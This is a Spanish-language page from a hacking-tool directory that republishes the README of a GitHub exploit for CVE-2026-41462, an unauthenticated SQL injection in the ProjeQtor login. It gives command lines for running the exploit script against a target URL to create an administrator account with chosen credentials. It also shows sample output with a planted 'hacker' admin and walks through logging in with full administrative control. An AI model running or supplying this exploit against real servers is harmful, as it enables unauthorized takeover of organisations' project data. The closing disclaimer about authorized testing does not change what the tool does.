Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-41462 — CVE-2026-41462 | Kitploit
Herramientas/GitHubGitHub/0xblackash/cve-2026-41462
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHub0xblackash/cve-2026-41462

CVE-2026-41462

CVE-2026-41462

Ver Repositorio
13hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 CVE-2026-41462 - Inyección SQL no autenticada en ProjeQtor

projeqtor_cover

Inyección SQL crítica no autenticada en ProjeQtor ≤ 12.4.3

Critical CVSS 9.8 Unauthenticated

📌 Resumen

CVE-2026-41462 es una vulnerabilidad crítica de inyección SQL no autenticada en la funcionalidad de inicio de sesión de la herramienta de gestión de proyectos ProjeQtor.

  • CVE ID: CVE-2026-41462
  • Versiones afectadas: ProjeQtor 7.0 a 12.4.3
  • Versión parcheada: 12.4.4
  • Severidad: Crítica (CVSS 9.8)
  • Tipo: Inyección SQL apilada no autenticada

🛠️ Explotación

Uso

root@kitploit:~
python3 CVE-2026-41462.py -u http://target.com --create-admin

# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
  --username admin123 --password StrongPass2026!
Descargar herramienta

📊 Qué verás si funciona

Cuando el exploit tenga éxito, verás una salida similar a esta:

root@kitploit:~
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php

Después de ejecutar el exploit:

  1. Abre tu navegador y ve a:
    http://target.com/login.php

  2. Inicia sesión con las credenciales que se muestran en la salida del script.

  3. Si tiene éxito, accederás al Panel de administración de ProjeQtor con privilegios administrativos completos.

Indicadores de éxito:

  • Puedes ver todos los proyectos, usuarios y ajustes del sistema
  • Puedes crear/editar/eliminar proyectos sin restricciones
  • El nuevo usuario aparece en la sección de gestión de usuarios

📁 Contenido del repositorio

ArchivoDescripción
CVE-2026-41462.pyScript principal de explotación
CVE-2026-41462.yamlPlantilla de detección para Nuclei
README.mdEsta documentación

🚀 Inicio rápido

  1. Clona el repositorio:

    root@kitploit:~
    git clone https://github.com/0xBlackash/CVE-2026-41462.git
    cd CVE-2026-41462
    
  2. Ejecuta el exploit:

    root@kitploit:~
    python3 CVE-2026-41462.py -u http://target.com --create-admin
    
  3. Inicia sesión con la cuenta de administrador recién creada.


⚠️ Aviso legal

Esta herramienta está destinada únicamente a fines educativos y pruebas de penetración autorizadas. El uso no autorizado es ilegal.


📄 Referencias

  • NVD - CVE-2026-41462
  • Parche oficial de ProjeQtor (v12.4.4+)

Divulgación responsable • Solo hacking ético
Mantente a salvo. Prueba legalmente.